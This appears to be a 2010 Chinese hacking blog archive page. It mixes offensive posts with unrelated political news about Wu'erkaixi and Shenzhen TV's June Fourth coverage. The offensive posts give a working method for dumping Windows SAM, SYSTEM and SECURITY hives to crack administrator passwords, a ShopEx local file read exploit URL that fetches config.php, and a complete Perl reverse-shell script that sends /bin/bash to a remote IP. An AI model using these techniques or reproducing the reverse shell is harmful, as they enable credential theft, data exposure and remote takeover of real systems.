2010年6月19日星期六
2010年6月16日星期三
2010年6月10日星期四
2010年6月9日星期三
2010年6月5日星期六
渗透中另一种抓系统密码HASH 的技巧
现在登录目标3389 后,我看好多人都已经习惯抓密码HASH 然后回来彩虹表破解出明文了,或者传个
winloginhack 来记录3389 的登录密码。在我最近的几次渗透中,发现pwdump,fgdump 这类工具现在已经
不免杀了,而且这类工具都是要注入到lsass.exe 进程的,遇到macfee 这类的杀毒软件,默认是绕不过去的。
Winlogin 网上放出来的,经过我的测试,对WIN2008 是没有效果的。今天浏览BLOG,看到老外提到另一
种抓系统密码hash 的技巧,经过实践,发现可行,分享给大家。
首先使用 administrator 权限登录,然后使用reg 来保存注册表中HKLM 下的SECURITY,SAM,SYSTEM,注
意这里必须使 用reg 的save 选项,export 选项是不行的,
reg save hklm\sam sam.hive
reg save hklm\system system.hive
reg save hklm\security security.hive
如图1:
然后把sam.hive,system.hive,security.hive 下载回本地,打开CAIN,在"Decoders"标签下,点"LSA Secrets",
点"+"来导入system.hive 和security.hive.
如图2
这里一般就能看到管理员的明文密码了, 如图3,当然这里的密码,有时候也是历史密码。如果尝试登录
不对,可以来尝试爆破lm/ntlm hash.
要破解LM/NTLM hash,首先点"cracker"标签下的"LM&NTLM hashes",然后点"+",导入sam.hive,注意由于
现在的win2000 以后都默认使用了syskey,所以还要导入system.hive 中的syskey 的值,然后就可以彩虹表
破解了。如图4.如图5
后话:
这个方法不是对所有WINDOWS 发行版本都通用的,比如对win 2000 sp4,win xp sp2 就不行,对
win2003,2008 是管用的。具体工作列表如下:
Windows 2000 SP4 (admin) = access denied
Windows XP SP2 (admin) = access denied
Windows XP SP3 (admin) = access denied
Windows 2003 R2 SP2 (admin) = works
Windows Vista SP2 (UAC/admin) = works
Windows 2008 SP1 (admin) = works
Windows 7 (UAC/admin) = works
cmd下读取终端端口
然后 type c:\\tsport.reg | find "PortNumber"
2010年6月4日星期五
ShopEx网上商店系统/shopadmin/index.php 本地文件读取漏洞
Shopex V4.8.5
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。
index.php在对参数的处理过程中存在本地文件读取漏洞
本站提 供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
http://ssvdb.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php
厂商补丁:
ShopEx.cn
------------------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
www.ShopEx.cn
吾尔开希日本中使馆寻“自首”遭扣留
居住在台湾已经13年的吾尔开希表示,由于台湾没有中国大使馆,他去年曾经到过澳门联络办公室,寻求引渡我回 国,当遭到拒绝。不得已情况下近日特地赶来日本,通过日本警视厅寻求与驻东京日本大使馆对话,并表示21年来要求对话始终贯彻到底。
吾尔开 希说,"对话是以一种自己的意志,深刻的自己的意志,他是民主最核心的价值。"21岁就不得不流亡海外的吾尔开希,人生的一半是在流亡中度过。在21年后 今天的吾尔开希表示,"我依然要求以对话的形式与21年前的天安门广场一样,这种和平的方式,哪怕是以自首的方式,哪怕通过答辩的方式,来贯彻我自始自终 的对话原则。"
站在驻东京日本大使馆前栅栏的外侧,他指着栅栏说,"警察告诉我,这个栅栏 的内侧是中国管辖,这个栅栏的外侧是日本国土,我现在站在这个边界线上,这个简单的一条线,隔绝着我与祖国,回到祖国是天赋的权利,分隔21年还要用自首 的方式,这个有形无形的栅栏,挡着我,因为我是中国政府通缉的一号人物,我寻求回家的努力不会停止!我敢投案,你敢不敢抓我!?"
吾尔开希 谈到他21年来见不到父母和家人,"中国政府的株连九族的手段造成的人伦惨剧,我21年没有见到我的父母,兄弟姐妹。"
他逼于无奈的表示, "即使引渡我回中国,我被逮捕,至少以探监的形式,我可以见到我的父母,我可以与中国政府对话,哪怕以起诉书,答辩状的形式,因此,今天我以自首的方式来 到中国驻日大使馆。"
大约在下午两点半,寻求"自首"的吾尔开希在得不到大使馆的任何回应后,越过大使馆栅栏,欲闯入大使馆,即被日本警视 厅警察抓捕,送往东京麻布警察署遭扣留。
与此同时,今天六四正日,包括日本民主阵线等多个民运团体均发出抗议之声,抗议中共血腥镇压学生等 活动,要求"平反六四血债血还。"深圳卫视播出“平反六四”内容遭当局查处
据法广报导,深圳卫视所属的深圳广播电影电视集团总裁王茂亮、总编辑陈君聪以及深圳卫视的多名负责人已经停职接受调查。
据报导,20多年来,深圳卫视是大陆唯一公开要求为“六四”平反的媒体,再加上深圳卫视近来频频报导中共认为的“敏感”话 题。例如播出国家副主席习近平批评西方国家对中国事务“指手画脚”的内容、在玉树地震报导时称受灾的“藏民”为“ 葬民”,以及节目画面中拍到“法轮大法好”、“台湾中国,一边一国”等。
相关官员声 称,对深圳广电集团责任人处理是为了控制事态的影响,并警示其它媒体不准报导有关六四的内容。
法新社在报导指出,中共当局在改善人权自由方面装聋作哑。
图: 2010年6月3日“六四事件”21周年纪念前夕,深圳卫视《正午30分》栏目因为播出“六四要平反”的画面和采访要求平反“六四事件”的人士,遭到处 分。
2010年6月3日星期四
Linux下提權反彈腳本
#!/usr/bin/perl -w
#
use strict;
use Socket;
use IO::Handle;
if($#ARGV+1 != 2){
print "$#ARGV $0 Remote_IP Remote_Port \n";
exit 1;
}
my $remote_ip = $ARGV[0];
my $remote_port = $ARGV[1];
my $proto = getprotobyname("tcp");
my $pack_addr = sockaddr_in($remote_port, inet_aton($remote_ip));
my $shell = '/bin/bash -i';
socket(SOCK, AF_INET, SOCK_STREAM, $proto);
STDOUT->autoflush(1);
SOCK->autoflush(1);
connect(SOCK,$pack_addr) or die "can not connect:$!";
open STDIN, "<&SOCK";
open STDOUT, ">&SOCK";
open STDERR, ">&SOCK";
print "Enjoy the shell.\n";
system($shell);
close SOCK;
exit 0;
把以上代碼保存為*.pl